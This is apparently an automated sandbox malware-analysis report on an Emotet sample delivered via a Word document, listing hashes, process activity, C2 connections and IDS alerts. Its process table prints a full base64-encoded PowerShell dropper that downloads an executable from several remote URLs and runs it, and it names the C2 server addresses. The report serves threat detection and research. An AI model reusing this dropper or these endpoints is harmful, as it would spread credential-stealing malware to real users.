analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample.zip

Full analysis: https://app.any.run/tasks/ce4886aa-3059-4eea-80d3-ce000c67ee07
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 17:54:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet
trojan
evasion
stealer
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

2681A6BED0DFCE8D0441E54FB0D357B4

SHA1:

65A307AD87FB2D2C30E11E56781DA82F9DA7BD6E

SHA256:

52531D2E32E21C3109BEB074098D98AB7807CD130832E69264820A7F1BABE6CB

SSDEEP:

3072:sKH+r9M6V615mqUCt3ImFOxpl/BLJOxAG1LQOyu66BFhaE:s5rG6V67l1VFcBlIAG1LQOyu66p5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 968.exe (PID: 3932)
      • 968.exe (PID: 2816)
      • msptermsizes.exe (PID: 3972)
      • msptermsizes.exe (PID: 2140)
      • msptermsizes.exe (PID: 3980)
    • Emotet process was detected

      • 968.exe (PID: 2816)
    • EMOTET was detected

      • msptermsizes.exe (PID: 3972)
    • Changes the autorun value in the registry

      • msptermsizes.exe (PID: 3972)
    • Connects to CnC server

      • msptermsizes.exe (PID: 3972)
    • Stealing of credential data

      • msptermsizes.exe (PID: 3980)
    • Uses NirSoft utilities to collect credentials

      • msptermsizes.exe (PID: 3980)
    • Actions looks like stealing of personal data

      • msptermsizes.exe (PID: 3980)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2744)
    • Executed via WMI

      • powershell.exe (PID: 2744)
    • Executable content was dropped or overwritten

      • 968.exe (PID: 2816)
      • powershell.exe (PID: 2744)
    • Creates files in the user directory

      • powershell.exe (PID: 2744)
    • Starts itself from another location

      • 968.exe (PID: 2816)
    • Application launched itself

      • msptermsizes.exe (PID: 3972)
    • Loads DLL from Mozilla Firefox

      • msptermsizes.exe (PID: 3980)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Manual execution by user

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 17:53:14
ZipCRC: 0x129ffde9
ZipCompressedSize: 138713
ZipUncompressedSize: 237056
ZipFileName: 1dee09b40f84fedce8227e251073f269971a16e39e75af46c3658f0802c828f3.bin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs winword.exe no specs powershell.exe 968.exe no specs #EMOTET 968.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2168"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\hero.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2744powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAA1AGYAZgA2ADMANAAzAGMANwBlADAAPQAnAGEAMAB4ADEAYQAyAGQANgAxADQAYQBiAGEAOAA1ADIAMAAnADsAJABhADAAeABjADUAZgBmAGMAOQBiAGQAMgAyADUANQBjADUAZQAgAD0AIAAnADkANgA4ACcAOwAkAGEAMAB4AGUANABlAGYANwAwADIANgBiADkAMABiADIANQA9ACcAYQAwAHgANwAyADEAYgAzAGYAZQBkADcAMgA5ACcAOwAkAGEAMAB4ADQAMwAyADUAMgBiAGUAYgA5AGMAYgA0ADUAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYwA1AGYAZgBjADkAYgBkADIAMgA1ADUAYwA1AGUAKwAnAC4AZQB4AGUAJwA7ACQAYQAwAHgAMQAwADQAZQAzADgAOQAyADUAOQAwADgAPQAnAGEAMAB4AGMAMAA5ADcANgBlAGUAZAAwAGUAOQA1AGYANQAxACcAOwAkAGEAMAB4ADMANQBhAGIANQBjAGUAYQBlADEAOABlADgAOQA9AC4AKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAHQALgBXAEUAYgBDAEwASQBlAG4AVAA7ACQAYQAwAHgAYwA4ADQAZgA1AGQAMwAzADkAOAA9ACcAaAB0AHQAcABzADoALwAvAHMAaAByAGUAZQB1AG0AaQB5AGEAZwByAG8AdQBwAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AaQBiADUAZQB0AC0ANAAzAGcAZgAtADQAMQA1ADIANQAyADAAMwA3AC8AKgBoAHQAdABwAHMAOgAvAC8AZQBsAGUAYwB0AHIAbwBrAGEAdgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoASwBKAEUASwBPAFgARQBaAC8AKgBoAHQAdABwADoALwAvAGEAbQBpAHQAbgBhAHcAYQBuAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB4AE0ARwB2AEUASQBnAFgALwAqAGgAdAB0AHAAcwA6AC8ALwBqAGEAbgBlAGsAdgBhAGwAdABpAG4ALgBjAG8AbQAvAHUAYgBwAG8AcwAvAHgANABhAHQAMwA1AHkAcABkADMALQB5AGwAegB2AGYAbwBzAC0AMAAxADcAMwA5ADEAMAA4ADAALwAqAGgAdAB0AHAAcwA6AC8ALwBkAHUAcABlAHIAYQBkAHoALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFkAegBkAEMASQBsAFUALwAnAC4AIgBzAHAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAYQAwAHgANgBjAGYAYQA5AGIAYwBmAGMAMQA4AD0AJwBhADAAeAA2AGQAMQBjAGUAYgAzADYAOAAzADAANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAYQAyADgAZAAxADUANwBiADkAZgAzADYAMwAgAGkAbgAgACQAYQAwAHgAYwA4ADQAZgA1AGQAMwAzADkAOAApAHsAdAByAHkAewAkAGEAMAB4ADMANQBhAGIANQBjAGUAYQBlADEAOABlADgAOQAuACIARABPAFcAYABOAEwATwBBAEQAYABGAEkATABFACIAKAAkAGEAMAB4AGEAMgA4AGQAMQA1ADcAYgA5AGYAMwA2ADMALAAgACQAYQAwAHgANAAzADIANQAyAGIAZQBiADkAYwBiADQANQAxACkAOwAkAGEAMAB4ADkAMwAwAGMANAA5AGIAYwA3ADMANAA9ACcAYQAwAHgAOQBkADUAYQA3AGUANgBlADIANAA0AGEAOQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGEAMAB4ADQAMwAyADUAMgBiAGUAYgA5AGMAYgA0ADUAMQApAC4AIgBsAGUAbgBgAGcAdABIACIAIAAtAGcAZQAgADMANQA4ADIAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAdAAiACgAJABhADAAeAA0ADMAMgA1ADIAYgBlAGIAOQBjAGIANAA1ADEAKQA7ACQAYQAwAHgANgA2ADgANQA4ADIAMwBkADcANQA0ADYAPQAnAGEAMAB4ADUAZAA3ADIAMwBhADkAMgA4ADgANwBlAGUANgAnADsAYgByAGUAYQBrADsAJABhADAAeAAyAGEANgA1ADYAMQBhAGUAMwA0ADUAZgBlADUAPQAnAGEAMAB4AGMANgBkADgANQA5AGQAMwBkADAAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgANABjAGUAYwAzAGEAMAAyADQANAAzADkAZQA9ACcAYQAwAHgAYQA0ADMANQAwAGYAOQBhADkAZQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3932"C:\Users\admin\968.exe" C:\Users\admin\968.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2816--d55991b9C:\Users\admin\968.exe
968.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2140"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe968.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3972--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Version:
1, 0, 0, 1
3980"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" /scomma "C:\Users\admin\AppData\Local\Temp\E6EB.tmp"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Total events
2 958
Read events
2 086
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
3
Unknown types
16

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR22FE.tmp.cvr
MD5:
SHA256:
2744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\33GKAHXFAIDLLE2ES4AY.temp
MD5:
SHA256:
2952WINWORD.EXEC:\Users\admin\Desktop\~$hero.docpgc
MD5:D17F055567AEFF78F20C2DCEEB3CDDDD
SHA256:02997C861BA55D9307D010A6C91863472F1ED28D6140759EF631C85928EC3F8C
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9C97F0.wmfwmf
MD5:9D75EE758515C000E1448CCD2C7C7EF8
SHA256:94A247FEBE5DBF8347485CC0059BB48E0D5116DA57036B80626B50CD6BC1E156
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:DF4CB057968E8A5510051549076E4859
SHA256:AE28D02BF5F757A9CB253DB9883E17A9DE86CFC8E7915FDD03C007A63CE3459F
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6DB12EB.wmfwmf
MD5:8825E9B760F08A27ABEFCB8BAD1A61C8
SHA256:603F41A9AC70369290851615FD57B1EC8A49EC7A4D6EAFDB0F84E527BF9BACC0
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CAC69AA.wmfwmf
MD5:D80CD9865C96FC01A002C4AB2702702B
SHA256:6548B47FAEFA84C1854AAFAB99162F6362AA585A6FE112540B41AAC881DD29BD
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD5FE12.wmfwmf
MD5:5D6FD4A9D5777302164F272765429B40
SHA256:C7BF22B810A60ABE272FDEFC6EA676C4947694313FF8CF9DDFBE55461C68B1BC
2744powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a33a8.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2952WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7D66C3C.wmfwmf
MD5:0A6ED135C474427BCC8416A2284C4E21
SHA256:7E808A6A287638843364F795A03A14CE7C116E7163E670B87E192959AA40B066
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
68
DNS requests
48
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3972
msptermsizes.exe
GET
192.241.241.221:443
http://192.241.241.221:443/whoami.php
US
malicious
3972
msptermsizes.exe
GET
192.241.241.221:443
http://192.241.241.221:443/whoami.php
US
malicious
3972
msptermsizes.exe
POST
200
178.32.255.133:443
http://178.32.255.133:443/merge/stubs/
FR
binary
148 b
malicious
3972
msptermsizes.exe
GET
200
185.187.198.5:8080
http://185.187.198.5:8080/whoami.php
RU
text
14 b
malicious
3972
msptermsizes.exe
GET
200
178.32.255.133:443
http://178.32.255.133:443/whoami.php
FR
text
14 b
malicious
3972
msptermsizes.exe
POST
200
190.117.206.153:443
http://190.117.206.153:443/merge/jit/add/merge/
PE
binary
148 b
malicious
3972
msptermsizes.exe
POST
200
185.187.198.5:8080
http://185.187.198.5:8080/balloon/
RU
binary
168 Kb
malicious
3972
msptermsizes.exe
POST
200
178.32.255.133:443
http://178.32.255.133:443/ban/
FR
binary
148 b
malicious
3972
msptermsizes.exe
POST
200
190.117.206.153:443
http://190.117.206.153:443/tlb/tlb/add/merge/
PE
mp3
1.85 Mb
malicious
3972
msptermsizes.exe
POST
200
185.187.198.5:8080
http://185.187.198.5:8080/splash/add/
RU
binary
3.20 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2744
powershell.exe
173.248.148.197:443
shreeumiyagroup.com
Handy Networks, LLC
US
unknown
3972
msptermsizes.exe
178.32.255.133:443
OVH SAS
FR
malicious
3972
msptermsizes.exe
185.187.198.5:8080
Pravoved LLC
RU
malicious
3972
msptermsizes.exe
192.241.241.221:443
Digital Ocean, Inc.
US
malicious
3972
msptermsizes.exe
190.117.206.153:443
America Movil Peru S.A.C.
PE
malicious
3972
msptermsizes.exe
203.89.134.15:465
mail.omlogistics.co.in
OM Logistics Limited
IN
unknown
3972
msptermsizes.exe
202.137.236.12:587
smtp.rediffmailpro.com
Rediff.com India Limited
IN
unknown
3972
msptermsizes.exe
188.125.73.26:587
smtp.mail.yahoo.com
CH
unknown
3972
msptermsizes.exe
74.125.133.109:465
smtp.gmail.com
Google Inc.
US
whitelisted
3972
msptermsizes.exe
217.74.64.236:465
poczta.interia.pl
INTERIA.PL Sp z.o.o.
PL
unknown

DNS requests

Domain
IP
Reputation
shreeumiyagroup.com
  • 173.248.148.197
unknown
smtp.gmail.com
  • 74.125.133.109
shared
mail.sstelecoms.com
  • 41.204.202.2
unknown
smtp.dapda.com
  • 178.32.46.149
unknown
mail.omlogistics.co.in
  • 203.89.134.15
  • 203.89.134.115
  • 203.89.134.215
  • 203.89.135.15
  • 203.89.135.115
  • 203.89.135.215
unknown
smtp.rediffmailpro.com
  • 202.137.236.12
  • 202.137.237.24
shared
smtp.mail.yahoo.com
  • 188.125.73.26
shared
poczta.interia.pl
  • 217.74.64.236
unknown
smtp.live.com
  • 40.101.137.66
  • 52.97.150.2
  • 40.101.136.242
  • 40.101.136.2
shared
imap.twomountains.co.za
  • 196.22.132.224
unknown

Threats

PID
Process
Class
Message
3972
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 11
3972
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3972
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3972
msptermsizes.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3972
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3972
msptermsizes.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3972
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3972
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3972
msptermsizes.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
3972
msptermsizes.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
10 ETPRO signatures available at the full report
No debug info